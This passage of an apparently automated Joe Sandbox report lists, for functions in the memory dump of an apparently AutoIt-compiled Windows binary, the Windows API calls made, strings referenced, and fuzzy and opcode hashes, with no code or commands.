                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                      • String ID: 2
                                      • API String ID: 1331449709-450215437
                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                      • API String ID: 3054410614-2561132961
                                      • Opcode ID: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                      • Opcode Fuzzy Hash: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 600699880-22481851
                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                      • API String ID: 2907320926-3566645568
                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                      • DeleteObject.GDI32(?), ref: 00470A04
                                      • DestroyIcon.USER32(?), ref: 00470A1C
                                      • DeleteObject.GDI32(?), ref: 00470A34
                                      • DestroyWindow.USER32(?), ref: 00470A4C
                                      • DestroyIcon.USER32(?), ref: 00470A73
                                      • DestroyIcon.USER32(?), ref: 00470A81
                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 1237572874-0
                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                      • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                      • GetKeyState.USER32(00000011), ref: 00444903
                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                      • String ID: AU3_FreeVar
                                      • API String ID: 2634073740-771828931
                                      • Opcode ID: b507345be42db7d231d4fe87dde8ac6b57174e0137230698672f4dfbf5c6882f
                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                      • Opcode Fuzzy Hash: b507345be42db7d231d4fe87dde8ac6b57174e0137230698672f4dfbf5c6882f
                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                      APIs
                                      • CoInitialize.OLE32 ref: 0046C63A
                                      • CoUninitialize.OLE32 ref: 0046C645
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 2294789929-1287834457
                                      • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                      • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                      APIs
                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                      • ReleaseCapture.USER32 ref: 0047116F
                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 2483343779-2107944366
                                      • Opcode ID: 84691534691ed2654ec9f54acb8cd948186dc9df3e1473831bff1d03c15b5f1e
                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                      • Opcode Fuzzy Hash: 84691534691ed2654ec9f54acb8cd948186dc9df3e1473831bff1d03c15b5f1e
                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                      • _wcslen.LIBCMT ref: 00450720
                                      • _wcscat.LIBCMT ref: 00450733
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat_wcslen
                                      • String ID: -----$SysListView32
                                      • API String ID: 4008455318-3975388722
                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
